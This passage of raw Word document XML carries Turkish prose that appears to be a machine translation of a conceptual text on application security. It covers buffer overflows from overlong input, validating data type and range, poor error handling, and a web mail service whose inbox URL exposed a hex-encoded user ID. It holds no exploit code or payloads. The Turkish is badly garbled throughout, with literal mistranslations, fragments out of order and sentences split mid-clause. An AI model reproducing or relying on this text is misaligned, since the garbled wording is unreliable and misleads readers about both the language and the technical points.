          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ogram talimatlarını kapladı. Ne</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> programcı, derleyici veya test cihazı böyle bir uzunlukta ne ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acağını sormadı. En az iki ayrı</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> işlevin uygulama</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ları bu şekilde başarısız oldu. </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evet, dışarıda gerçekten bu şekilde stres yaratan insa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nlar var. Biri bunu savunabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64 KB'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">den büyük bir dosya adı olup olmadığını kontrol etmeniz gerekmez. Çoğu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dosya sistemi kabul etmedi bile </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>böyle bir uzunluk. Neden biri böyle bir şey yapsın ki? Cevap, sömürülebilir bir başarısızlığa ned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">en olup olmayacağını görmektir; Cevap, olduğu gibi. </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNIX için pek çok derleyici, programcının arabellek boyutunu uygulama sırasında statik ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arak tahsis etmesine izin verir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> saati. Bu, böyle bir aşırı çalışmayı daha olası kılar ancak performansı ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tırır. Tamponun dinamik tahsisi</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kazara aşırı yüklenmeye karşı koyma olasılığı daha yüksektir, ancak kasıtlı olarak aşırı uzun süre kullanan s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aldırılara karşı kanıt değildir veri alanları.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu saldırılar genel olarak “arabellek taşması” saldırıları olarak bilinir. Bu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sınıftan sonra on yıldan fazla</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sorun tespit edildi, savunmasız programlar çoğalmaya d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>evam ediyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uzunluğa </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ek olarak, kodu, veri türünü, biçimini, aralığını ve geçersiz karakter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>leri kontrol etmek gerekir. çok</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bilgisayarlar birden fazla kod türünü tanır (örneğin, sayısal, alfabetik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ASCII, onaltılık veya ikili).</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sık sık, bunlardan biri diğerinde kodlanabilir. Örneğin, bir ikili num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ara her ikisine de girilebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sayısal veya alfa numerik bir alan. Uygulama programı, kod değerlerinin her ikisinde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de yasal olmasını sağlamalıdır</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kod setleri - giriş ve ekran seti ve depolama seti. Modern veri tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>anı yöneticilerinin</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> çok bağışlayıcı, programın çalışmaya devam ettiği gerçeği verilerin doğr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u olduğu anlamına gelmeyebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Veri tipleri (örneğin, alfa, tarih, para birimi) de kontrol edilmelidir. Uygulama</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nın kendisi ve diğer programlar</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> veriler üzerinde çalışmak tarihlerin ve para birimi biçimlerinin doğruluğuna çok h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assas olabilir. Doğru olan veri</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kod ve veri türüne göre hala geçerli olmayabilir. Örneğin, ölüm tarihin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>den sonra olan bir doğum tarihi</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> geçerli bir veri türü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> olmasına rağmen geçerli değil.</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EKSİK HATA İŞLEME</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Parametre kontrol problemiyle yakından ilişkili olarak hata işlemeyle ilgilidir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Çalışan dolandırıcılık sayısı</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kökleri, doğru şekilde ele alınmamış masum hatalarda bulunur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Çalışan masum bir hata yapar;</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hiçbir şey olmuyor. Çalışan zarfı iter; hala hiçbir şey. Çalı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şan üzerinde şafak başlar</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hatayı kendi yararına yapabilirdi - ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yine de hiçbir şey olmayacaktı.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Geleneksel uygulamalarda ve ortamlarda, bu tür koşullar yeterince t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ehlikeliydi. Ancak, onlar vardı</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Çalışanlar tarafından görülmesi en muhtemeldir. Bazı çalışanlar durumu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rapor edebilir. Modern ağda, öbür</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> şartların tüm dünyaya görünmesi olağandışı değ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ildir. Görebilen nüfus arttıkça</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistem veya uygulama, daha fazla saldırı yaşanması muhtemeldir. Bir saldırgan ne kada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r çok hedef görürse o kadar çok</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> büyük olasılıkla başarılı olması, özellikle de saldırısını ot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>omatikleştirebilmesi durumunda.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hatalar üzerine yüklendiğinde, sistemlerin veya uygulamaların olağandışı şekilde başarısız olması olağandışı de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ğildir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programcılar, programın ilk hatayı bile doğru şekilde işlemesini sağlamak için prog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ramlayamaz veya test edemezler,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> başarılı olanlar için çok daha az. Saldırganlar, diğer taraftan, sömürülebilir koşu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>llar yaratmaya çalışıyor; onlar</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Her türlü hatalı girişleri deneyecek ve daha sonra bu hataların üstüne daha fazla hata göndereceksiniz. Bu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tür bir saldırı olmasına rağmen</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hiç bir zarar vermeyebilir, bazen bir hataya neden olabilir ve baz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>en bir istismara neden olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> şart. Yukarıdaki gibi, saldırganlar kendi zamanlarını ucuza değerlendirebilir, saldır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ılarını otomatikleştirebilir ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çok sabırlı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003A072B"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KULLANIM SÜRESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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KONTROL SÜRESİ</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lastRenderedPageBreak/>
        <w:t>Son zamanlarda, bir Web posta servisi uygulaması kullanıcısı, Gelen Kutusunu “ye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r imlerine ekleyebileceğini” ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kapatmadan ve yeniden başlattıktan sonra bile, tekrar otu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rum açmadan doğrudan gelecekte.</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cuma öğleden sonra, kullanıcı bunu bazı arkadaşlarına işaret etti. Cumartesiye ka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dar, başka bir kullanıcı tanıdı</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bu çalışmayı yapan şeylerden birinin onaltılık olarak kodlanmış kullanıcı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tanımlayıcısının (UID) olduğu;</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gelen Kutusu sayfasının evrensel kayıt bulucusuna (URL) dahil edilmiştir. Bu ku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>llanıcı ne olacağını merak etti</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> başka birinin UID'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>si de aynı şekilde kodlanmış ve URL’ye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> girmiştir. Okuyucu şaşırmamalı</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İse yaradığını öğrenmek için. Pazar günü, birileri ASCII’de kodlanmış keyfi bir UID’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yi almak için bir sayfa yazmış,</w:t>
      </w:r>
      <w:r w:rsidRPr="00955814">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> onaltılığa dönüştürün ve doğrudan herhangi bir kullanıcının Gelen Kutusuna gidin. P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
